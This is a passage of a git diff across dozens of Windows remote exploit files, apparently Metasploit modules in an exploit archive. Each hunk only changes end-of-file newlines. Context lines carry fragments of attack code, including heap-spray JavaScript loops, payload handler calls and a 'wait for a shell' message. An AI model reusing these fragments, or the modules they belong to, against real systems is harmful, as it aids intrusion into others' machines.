b/platforms/windows/remote/16419.rb index af28dcf82..fd5c60a51 100755 --- a/platforms/windows/remote/16419.rb +++ b/platforms/windows/remote/16419.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16420.rb b/platforms/windows/remote/16420.rb index d77b6eeff..4b5bd6661 100755 --- a/platforms/windows/remote/16420.rb +++ b/platforms/windows/remote/16420.rb @@ -143,4 +143,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16421.rb b/platforms/windows/remote/16421.rb index 060c26777..f20c9ac11 100755 --- a/platforms/windows/remote/16421.rb +++ b/platforms/windows/remote/16421.rb @@ -103,4 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16422.rb b/platforms/windows/remote/16422.rb index c2a1b465e..8348a1905 100755 --- a/platforms/windows/remote/16422.rb +++ b/platforms/windows/remote/16422.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16423.rb b/platforms/windows/remote/16423.rb index 58b5168a0..9dd288276 100755 --- a/platforms/windows/remote/16423.rb +++ b/platforms/windows/remote/16423.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16424.rb b/platforms/windows/remote/16424.rb index d106d64b0..5723d08e2 100755 --- a/platforms/windows/remote/16424.rb +++ b/platforms/windows/remote/16424.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16425.rb b/platforms/windows/remote/16425.rb index d0a65bd18..1f6f5b0e2 100755 --- a/platforms/windows/remote/16425.rb +++ b/platforms/windows/remote/16425.rb @@ -70,4 +70,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16426.rb b/platforms/windows/remote/16426.rb index 05cf4ba3c..a4d9b3eed 100755 --- a/platforms/windows/remote/16426.rb +++ b/platforms/windows/remote/16426.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16427.rb b/platforms/windows/remote/16427.rb index c006350fd..83398454e 100755 --- a/platforms/windows/remote/16427.rb +++ b/platforms/windows/remote/16427.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16428.rb b/platforms/windows/remote/16428.rb index 9ec219e35..b6fb33185 100755 --- a/platforms/windows/remote/16428.rb +++ b/platforms/windows/remote/16428.rb @@ -153,4 +153,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16429.rb b/platforms/windows/remote/16429.rb index f9f58d4b3..0c27edf6f 100755 --- a/platforms/windows/remote/16429.rb +++ b/platforms/windows/remote/16429.rb @@ -70,4 +70,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16430.rb b/platforms/windows/remote/16430.rb index 3aa2d5421..caa012607 100755 --- a/platforms/windows/remote/16430.rb +++ b/platforms/windows/remote/16430.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16431.rb b/platforms/windows/remote/16431.rb index 262a5f536..dfae1201c 100755 --- a/platforms/windows/remote/16431.rb +++ b/platforms/windows/remote/16431.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16432.rb b/platforms/windows/remote/16432.rb index a72a94376..eaa8e2f6a 100755 --- a/platforms/windows/remote/16432.rb +++ b/platforms/windows/remote/16432.rb @@ -179,4 +179,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16433.rb b/platforms/windows/remote/16433.rb index 8c6099686..d1e08eab3 100755 --- a/platforms/windows/remote/16433.rb +++ b/platforms/windows/remote/16433.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16434.rb b/platforms/windows/remote/16434.rb index a73ea5949..ed440e2c5 100755 --- a/platforms/windows/remote/16434.rb +++ b/platforms/windows/remote/16434.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16435.rb b/platforms/windows/remote/16435.rb index 95bb3106a..c2a728a18 100755 --- a/platforms/windows/remote/16435.rb +++ b/platforms/windows/remote/16435.rb @@ -213,4 +213,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16436.rb b/platforms/windows/remote/16436.rb index 51d44cf8a..d77a536bf 100755 --- a/platforms/windows/remote/16436.rb +++ b/platforms/windows/remote/16436.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16437.rb b/platforms/windows/remote/16437.rb index f2e95b88f..a42fd038e 100755 --- a/platforms/windows/remote/16437.rb +++ b/platforms/windows/remote/16437.rb @@ -182,4 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16438.rb b/platforms/windows/remote/16438.rb index f9b475dd0..7b8cb9a53 100755 --- a/platforms/windows/remote/16438.rb +++ b/platforms/windows/remote/16438.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16439.rb b/platforms/windows/remote/16439.rb index 3d703b4d1..d59e8a3ed 100755 --- a/platforms/windows/remote/16439.rb +++ b/platforms/windows/remote/16439.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16440.rb b/platforms/windows/remote/16440.rb index d84cecb08..81c462171 100755 --- a/platforms/windows/remote/16440.rb +++ b/platforms/windows/remote/16440.rb @@ -179,4 +179,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16441.rb b/platforms/windows/remote/16441.rb index adf4e66c3..fead2998a 100755 --- a/platforms/windows/remote/16441.rb +++ b/platforms/windows/remote/16441.rb @@ -104,4 +104,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16442.rb b/platforms/windows/remote/16442.rb index d2dedd8df..307f42a9c 100755 --- a/platforms/windows/remote/16442.rb +++ b/platforms/windows/remote/16442.rb @@ -85,4 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16443.rb b/platforms/windows/remote/16443.rb index a397d89f7..d6a72d6cf 100755 --- a/platforms/windows/remote/16443.rb +++ b/platforms/windows/remote/16443.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16444.rb b/platforms/windows/remote/16444.rb index 6636a693b..c0f3d0785 100755 --- a/platforms/windows/remote/16444.rb +++ b/platforms/windows/remote/16444.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16445.rb b/platforms/windows/remote/16445.rb index 22dfa8cc9..e9c1e5cb4 100755 --- a/platforms/windows/remote/16445.rb +++ b/platforms/windows/remote/16445.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16446.rb b/platforms/windows/remote/16446.rb index 90933431e..8453575de 100755 --- a/platforms/windows/remote/16446.rb +++ b/platforms/windows/remote/16446.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16447.rb b/platforms/windows/remote/16447.rb index 1c25faff8..ee7f61221 100755 --- a/platforms/windows/remote/16447.rb +++ b/platforms/windows/remote/16447.rb @@ -182,4 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16448.rb b/platforms/windows/remote/16448.rb index 3f6b1e57a..bbdef324e 100755 --- a/platforms/windows/remote/16448.rb +++ b/platforms/windows/remote/16448.rb @@ -161,5 +161,4 @@ class Metasploit3 < Msf::Exploit::Remote 5 end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16449.rb b/platforms/windows/remote/16449.rb index 27d2b3600..7bdbdb8df 100755 --- a/platforms/windows/remote/16449.rb +++ b/platforms/windows/remote/16449.rb @@ -188,4 +188,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16450.rb b/platforms/windows/remote/16450.rb index 42612e198..7ec084125 100755 --- a/platforms/windows/remote/16450.rb +++ b/platforms/windows/remote/16450.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16451.rb b/platforms/windows/remote/16451.rb index 7c0f54f5f..22dcecace 100755 --- a/platforms/windows/remote/16451.rb +++ b/platforms/windows/remote/16451.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16452.rb b/platforms/windows/remote/16452.rb index 4ec691f11..92cf532e3 100755 --- a/platforms/windows/remote/16452.rb +++ b/platforms/windows/remote/16452.rb @@ -141,4 +141,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16453.rb b/platforms/windows/remote/16453.rb index e594773d4..c8ea2e45f 100755 --- a/platforms/windows/remote/16453.rb +++ b/platforms/windows/remote/16453.rb @@ -70,4 +70,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16454.rb b/platforms/windows/remote/16454.rb index a51e84f45..bc6ec2cba 100755 --- a/platforms/windows/remote/16454.rb +++ b/platforms/windows/remote/16454.rb @@ -85,4 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16455.rb b/platforms/windows/remote/16455.rb index d14be165d..72b06fd23 100755 --- a/platforms/windows/remote/16455.rb +++ b/platforms/windows/remote/16455.rb @@ -217,4 +217,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16456.rb b/platforms/windows/remote/16456.rb index 63aca3be1..8653c91f0 100755 --- a/platforms/windows/remote/16456.rb +++ b/platforms/windows/remote/16456.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16457.rb b/platforms/windows/remote/16457.rb index 95e808159..d830349ed 100755 --- a/platforms/windows/remote/16457.rb +++ b/platforms/windows/remote/16457.rb @@ -136,4 +136,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16458.rb b/platforms/windows/remote/16458.rb index d3f01d553..e600ab6cb 100755 --- a/platforms/windows/remote/16458.rb +++ b/platforms/windows/remote/16458.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16459.rb b/platforms/windows/remote/16459.rb index 6589d7cae..ae0fcba1a 100755 --- a/platforms/windows/remote/16459.rb +++ b/platforms/windows/remote/16459.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16460.rb b/platforms/windows/remote/16460.rb index a9e532d0c..a4a2a5e83 100755 --- a/platforms/windows/remote/16460.rb +++ b/platforms/windows/remote/16460.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16461.rb b/platforms/windows/remote/16461.rb index 74bd0c070..8173428eb 100755 --- a/platforms/windows/remote/16461.rb +++ b/platforms/windows/remote/16461.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16462.rb b/platforms/windows/remote/16462.rb index c96137004..ce120a138 100755 --- a/platforms/windows/remote/16462.rb +++ b/platforms/windows/remote/16462.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16463.rb b/platforms/windows/remote/16463.rb index 2ae8b59c5..86f6dff81 100755 --- a/platforms/windows/remote/16463.rb +++ b/platforms/windows/remote/16463.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16464.rb b/platforms/windows/remote/16464.rb index 8e3cd9ca8..43b76a55d 100755 --- a/platforms/windows/remote/16464.rb +++ b/platforms/windows/remote/16464.rb @@ -139,4 +139,4 @@ class Metasploit3 < Msf::Exploit::Remote } end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16465.rb b/platforms/windows/remote/16465.rb index 724c35eb2..cf7b7466b 100755 --- a/platforms/windows/remote/16465.rb +++ b/platforms/windows/remote/16465.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16467.rb b/platforms/windows/remote/16467.rb index bd911e764..9a1a4cc66 100755 --- a/platforms/windows/remote/16467.rb +++ b/platforms/windows/remote/16467.rb @@ -235,4 +235,4 @@ class Metasploit3 < Msf::Exploit::Remote framework.events.remove_exploit_subscriber(self) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16468.rb b/platforms/windows/remote/16468.rb index 9b94b4110..d7f25a355 100755 --- a/platforms/windows/remote/16468.rb +++ b/platforms/windows/remote/16468.rb @@ -79,4 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16469.rb b/platforms/windows/remote/16469.rb index 24c592e17..cd4d60b12 100755 --- a/platforms/windows/remote/16469.rb +++ b/platforms/windows/remote/16469.rb @@ -111,4 +111,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16470.rb b/platforms/windows/remote/16470.rb index d31a620b2..84a3bfea5 100755 --- a/platforms/windows/remote/16470.rb +++ b/platforms/windows/remote/16470.rb @@ -189,4 +189,4 @@ class Metasploit3 < Msf::Exploit::Remote return false end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16471.rb b/platforms/windows/remote/16471.rb index 036034520..8c4a1ba78 100755 --- a/platforms/windows/remote/16471.rb +++ b/platforms/windows/remote/16471.rb @@ -152,5 +152,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16472.rb b/platforms/windows/remote/16472.rb index 423f97f8a..e3d388982 100755 --- a/platforms/windows/remote/16472.rb +++ b/platforms/windows/remote/16472.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16473.rb b/platforms/windows/remote/16473.rb index 2db133883..6f8904bf6 100755 --- a/platforms/windows/remote/16473.rb +++ b/platforms/windows/remote/16473.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16474.rb b/platforms/windows/remote/16474.rb index 1e3597a37..33506b44d 100755 --- a/platforms/windows/remote/16474.rb +++ b/platforms/windows/remote/16474.rb @@ -123,4 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16475.rb b/platforms/windows/remote/16475.rb index 27d7dc59c..d1502be3d 100755 --- a/platforms/windows/remote/16475.rb +++ b/platforms/windows/remote/16475.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16476.rb b/platforms/windows/remote/16476.rb index 9a162dadc..71a813571 100755 --- a/platforms/windows/remote/16476.rb +++ b/platforms/windows/remote/16476.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16478.rb b/platforms/windows/remote/16478.rb index a73cd3873..7d2280b25 100755 --- a/platforms/windows/remote/16478.rb +++ b/platforms/windows/remote/16478.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16479.rb b/platforms/windows/remote/16479.rb index e12b6ebff..a932ce5fc 100755 --- a/platforms/windows/remote/16479.rb +++ b/platforms/windows/remote/16479.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16480.rb b/platforms/windows/remote/16480.rb index f74226ee9..9c52d0211 100755 --- a/platforms/windows/remote/16480.rb +++ b/platforms/windows/remote/16480.rb @@ -79,4 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16481.rb b/platforms/windows/remote/16481.rb index 8f029a142..b537de93b 100755 --- a/platforms/windows/remote/16481.rb +++ b/platforms/windows/remote/16481.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16482.rb b/platforms/windows/remote/16482.rb index 62e362ccc..19932c391 100755 --- a/platforms/windows/remote/16482.rb +++ b/platforms/windows/remote/16482.rb @@ -99,4 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16483.rb b/platforms/windows/remote/16483.rb index 6477c73a8..27429fbde 100755 --- a/platforms/windows/remote/16483.rb +++ b/platforms/windows/remote/16483.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16484.rb b/platforms/windows/remote/16484.rb index 1d235d1f6..d0961ed38 100755 --- a/platforms/windows/remote/16484.rb +++ b/platforms/windows/remote/16484.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16485.rb b/platforms/windows/remote/16485.rb index ef6da2fc7..5adbacea8 100755 --- a/platforms/windows/remote/16485.rb +++ b/platforms/windows/remote/16485.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16486.rb b/platforms/windows/remote/16486.rb index 9bd34f34b..9ab1b5a8e 100755 --- a/platforms/windows/remote/16486.rb +++ b/platforms/windows/remote/16486.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16487.rb b/platforms/windows/remote/16487.rb index c22f4a2b1..e9d76195e 100755 --- a/platforms/windows/remote/16487.rb +++ b/platforms/windows/remote/16487.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16488.rb b/platforms/windows/remote/16488.rb index 36271814e..a844615ad 100755 --- a/platforms/windows/remote/16488.rb +++ b/platforms/windows/remote/16488.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16489.rb b/platforms/windows/remote/16489.rb index cfc7e929d..f560cd46e 100755 --- a/platforms/windows/remote/16489.rb +++ b/platforms/windows/remote/16489.rb @@ -80,4 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16490.rb b/platforms/windows/remote/16490.rb index 0878c4bb2..cf5727b30 100755 --- a/platforms/windows/remote/16490.rb +++ b/platforms/windows/remote/16490.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16491.rb b/platforms/windows/remote/16491.rb index 3092eaf36..7e507ccb7 100755 --- a/platforms/windows/remote/16491.rb +++ b/platforms/windows/remote/16491.rb @@ -76,4 +76,4 @@ require 'msf/core' end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16492.rb b/platforms/windows/remote/16492.rb index d4d4215ea..a86e28daf 100755 --- a/platforms/windows/remote/16492.rb +++ b/platforms/windows/remote/16492.rb @@ -157,4 +157,4 @@ for (#{j_counter} = 0; #{j_counter} <= #{offset}; #{j_counter}++) { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16493.rb b/platforms/windows/remote/16493.rb index aed3024e6..965230f3b 100755 --- a/platforms/windows/remote/16493.rb +++ b/platforms/windows/remote/16493.rb @@ -110,4 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16494.rb b/platforms/windows/remote/16494.rb index 8fb55c76d..23310d070 100755 --- a/platforms/windows/remote/16494.rb +++ b/platforms/windows/remote/16494.rb @@ -573,4 +573,4 @@ EOF pdf end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16496.rb b/platforms/windows/remote/16496.rb index 84eb4e4a5..034728cb8 100755 --- a/platforms/windows/remote/16496.rb +++ b/platforms/windows/remote/16496.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16497.rb b/platforms/windows/remote/16497.rb index 7184e5f68..23ba317cf 100755 --- a/platforms/windows/remote/16497.rb +++ b/platforms/windows/remote/16497.rb @@ -104,4 +104,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16498.rb b/platforms/windows/remote/16498.rb index a3ee712a3..91a3eb83a 100755 --- a/platforms/windows/remote/16498.rb +++ b/platforms/windows/remote/16498.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16499.rb b/platforms/windows/remote/16499.rb index db2983bfd..f270a6070 100755 --- a/platforms/windows/remote/16499.rb +++ b/platforms/windows/remote/16499.rb @@ -156,4 +156,4 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{ # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/165.c b/platforms/windows/remote/165.c index f8e3561d7..c0b597b26 100755 --- a/platforms/windows/remote/165.c +++ b/platforms/windows/remote/165.c @@ -1203,4 +1203,4 @@ msg("[+] Wait a few secs for a shell\n"); return 0; } -// milw0rm.com [2004-03-23] +// milw0rm.com [2004-03-23] \ No newline at end of file diff --git a/platforms/windows/remote/16500.rb b/platforms/windows/remote/16500.rb index a83c60943..483b78379 100755 --- a/platforms/windows/remote/16500.rb +++ b/platforms/windows/remote/16500.rb @@ -136,4 +136,4 @@ for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16502.rb b/platforms/windows/remote/16502.rb index c0c86c4f9..b1bc3ea32 100755 --- a/platforms/windows/remote/16502.rb +++ b/platforms/windows/remote/16502.rb @@ -132,4 +132,4 @@ EOF handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16505.rb b/platforms/windows/remote/16505.rb index d4b2ada9c..2194d2cca 100755 --- a/platforms/windows/remote/16505.rb +++ b/platforms/windows/remote/16505.rb @@ -104,4 +104,4 @@ while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}'); handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16506.rb b/platforms/windows/remote/16506.rb index 0a3a9bea8..3b9fa3e92 100755 --- a/platforms/windows/remote/16506.rb +++ b/platforms/windows/remote/16506.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16507.rb b/platforms/windows/remote/16507.rb index 708f5b12e..c61b9c2a2 100755 --- a/platforms/windows/remote/16507.rb +++ b/platforms/windows/remote/16507.rb @@ -125,4 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16508.rb b/platforms/windows/remote/16508.rb index 4a67c0cee..142b95b19 100755 --- a/platforms/windows/remote/16508.rb +++ b/platforms/windows/remote/16508.rb @@ -116,4 +116,4 @@ for (#{var_i} = 0; #{var_i} < 99024; #{var_i}++) { #{rand8} = #{rand8} + unescap handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16509.rb b/platforms/windows/remote/16509.rb index 0baf09ee9..e1f9e9108 100755 --- a/platforms/windows/remote/16509.rb +++ b/platforms/windows/remote/16509.rb @@ -284,5 +284,4 @@ else { end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16510.rb b/platforms/windows/remote/16510.rb index 5ebdb1ca0..8b06d7de1 100755 --- a/platforms/windows/remote/16510.rb +++ b/platforms/windows/remote/16510.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16511.rb b/platforms/windows/remote/16511.rb index 6c35af359..3039a642d 100755 --- a/platforms/windows/remote/16511.rb +++ b/platforms/windows/remote/16511.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16512.rb b/platforms/windows/remote/16512.rb index 00789dcea..97619b216 100755 --- a/platforms/windows/remote/16512.rb +++ b/platforms/windows/remote/16512.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16513.rb b/platforms/windows/remote/16513.rb index 7e614a2c3..50464e104 100755 --- a/platforms/windows/remote/16513.rb +++ b/platforms/windows/remote/16513.rb @@ -144,4 +144,4 @@ Please wait... end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16514.rb b/platforms/windows/remote/16514.rb index e2ebe22b5..d2650d5e5 100755 --- a/platforms/windows/remote/16514.rb +++ b/platforms/windows/remote/16514.rb @@ -116,4 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16515.rb b/platforms/windows/remote/16515.rb index 21514b6ba..cdb639605 100755 --- a/platforms/windows/remote/16515.rb +++ b/platforms/windows/remote/16515.rb @@ -141,4 +141,4 @@ end TODO: - make it more quiet - auto-migrate? -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16516.rb b/platforms/windows/remote/16516.rb index 6d9340e2c..2e6e28627 100755 --- a/platforms/windows/remote/16516.rb +++ b/platforms/windows/remote/16516.rb @@ -320,4 +320,4 @@ EOS rvas['BaseAddress'] + rvas[key] end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16517.rb b/platforms/windows/remote/16517.rb index dbff1bbf2..57ec5c98b 100755 --- a/platforms/windows/remote/16517.rb +++ b/platforms/windows/remote/16517.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16518.rb b/platforms/windows/remote/16518.rb index 20b86d0bd..6220fd572 100755 --- a/platforms/windows/remote/16518.rb +++ b/platforms/windows/remote/16518.rb @@ -150,4 +150,4 @@ Please wait... end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16519.rb b/platforms/windows/remote/16519.rb index 52a9791b1..7471e0384 100755 --- a/platforms/windows/remote/16519.rb +++ b/platforms/windows/remote/16519.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16520.rb b/platforms/windows/remote/16520.rb index 425074198..d9c97b5a3 100755 --- a/platforms/windows/remote/16520.rb +++ b/platforms/windows/remote/16520.rb @@ -115,4 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16521.rb b/platforms/windows/remote/16521.rb index b7f68610f..7b276d750 100755 --- a/platforms/windows/remote/16521.rb +++ b/platforms/windows/remote/16521.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16522.rb b/platforms/windows/remote/16522.rb index 1f9eeeaff..17a48a529 100755 --- a/platforms/windows/remote/16522.rb +++ b/platforms/windows/remote/16522.rb @@ -94,4 +94,4 @@ class Metasploit3 < 